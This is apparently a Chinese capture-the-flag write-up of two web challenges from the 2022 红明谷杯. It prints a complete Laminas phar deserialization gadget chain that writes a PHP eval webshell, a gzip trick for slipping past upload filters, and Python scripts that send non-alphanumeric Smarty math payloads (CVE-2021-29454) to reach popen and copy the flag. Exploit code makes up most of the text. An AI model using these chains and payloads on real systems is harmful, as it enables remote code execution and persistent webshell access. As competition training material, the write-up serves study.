2022红明谷杯web

Posted 2022-12-14 yu22x

Fan website

题目给了提示，和laminas有关。

扫描目录得到源码。
审计代码发现题目有个album路由，并且控制器只有一个/module/Album/src/Controller/AlbumController.php

里面包含几个处理函数，可以上传文件，删除文件。
但是上传文件过滤是白名单所以不是很好绕过。

并且内容里面不能有<? HALT_COMPILER

这就有点此地无银三百两了，无缘无故为啥过滤和phar有关的HALT_COMPILER。
上网搜这个组件的漏洞发现了一个反序列化漏洞https://xz.aliyun.com/t/8975，那就好说了，我们可以上传一个phar文件，然后删除文件调用unlink时触发反序列化。但是还得保证内容大于3kb，所以在序列化时加了个str_repeat('123',1000000)

<?php 

namespace Laminas\\View\\Resolver
	class TemplateMapResolver
		protected $map = ["setBody"=>"system"];
	

namespace Laminas\\View\\Renderer
	class PhpRenderer
		private $__helpers;
		function __construct()
			$this->__helpers = new \\Laminas\\View\\Resolver\\TemplateMapResolver();
		
	



namespace Laminas\\Log\\Writer
	abstract class AbstractWriter
	
	class Mail extends AbstractWriter
		protected $eventsToMail = ["echo '<?php eval(\\$_POST[1]);?>' > /var/www/public/a.php"];  								//  cmd  cmd cmd
		protected $subjectPrependText = null;
		protected $mail;
		function __construct()
			$this->mail = new \\Laminas\\View\\Renderer\\PhpRenderer();
		
	


namespace Laminas\\Log
	class Logger
		protected $writers;
		function __construct()
			$this->writers = [new \\Laminas\\Log\\Writer\\Mail()];
		
	


namespace
$a = new \\Laminas\\Log\\Logger();
$phar = new Phar("shell.phar"); //后缀名必须为 phar
$phar->startBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$phar->setMetadata($a); //将自定义的 meta-data 存入 manifest
$phar->addFromString("a", str_repeat('123',1000000)); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

?>

链子出来了还有个问题需要解决。绕过<?和__HALT_COMPILER
网上找到篇文章https://www.wangan.com/p/7fygf7a00f0fd793

可以把生成的phar文件gzip压缩。然后将后缀改成png。
上传完成后拿到文件路径。

文件删除处传入phar:///var/www/public/img/00bf23e130fa1e525e332ff03dae345d.png

蚁剑连接后得到flag

Smarty_calculator

扫描后台拿到源码
题目名字就是本题的考点了，php中的smarty模板。
经过搜索发现了和这个相关的cve CVE-2021-29454，是利用smarty中的math
学习一波之后就是可以通过传入math equation="(( x + y ) / z )" x=2 y=10 z=2进行计算。

并且源码中存在相关的文件src/Smarty/plugins/function.math.php
在里面发现了eval函数

那题目考查的应该就是命令执行漏洞了，往上翻，equation里面的内容不能有反引号和$并且左右括号个数要匹配。除此之外，还会进行一个正则匹配。

大概就是不能存在16进制，不能有字母开头的，否则的话，进入这个foreach循环。
在往下还是一个循环，如果传入的内容中使用的字符串不是equation或者format或者assign就会进行一个替换。
所以我们如果避免这两个循环就可以将传入的内容拼接后放入eval中。
我们很容易想到无数字字母rce。这样就被不会被正则表达式匹配到，也可以绕过另外一个循环（没有其他字母，$param中就只有equation一个键值）。
无数字字母的脚本我之前写了一个比较全的。https://blog.csdn.net/miuzzx/article/details/109143413直接拿自己脚本用了。
采用或运算构造，先来试下phpinfo

import requests
import urllib.parse
url="http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"

data='data':urllib.parse.unquote(''' math equation="1;('%30%28%30%29%2e%26%2f'|'%40%40%40%40%40%40%40')();//" ''')

r=requests.post(url,data=data,cookies='login':'1')
print(r.text)

存在df，但是留了个popen，所以可以用popen执行系统命令。
盲猜一波flag路径为/flag，执行系统命令cp /flag a
也就是构造php语句popen('cp /f* a','r')

import requests
import urllib.parse
url="http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"

data='data':urllib.parse.unquote(''' math equation="1;('%30%2f%30%25%2e'|'%40%40%40%40%40')(('%23%30%00%00%26%00%00%21'|'%40%40%20%2f%40%2a%20%40'),('%32'|'%40'));//" ''')

r=requests.post(url,data=data,cookies='login':'1')
print(r.text)

访问/a得到flag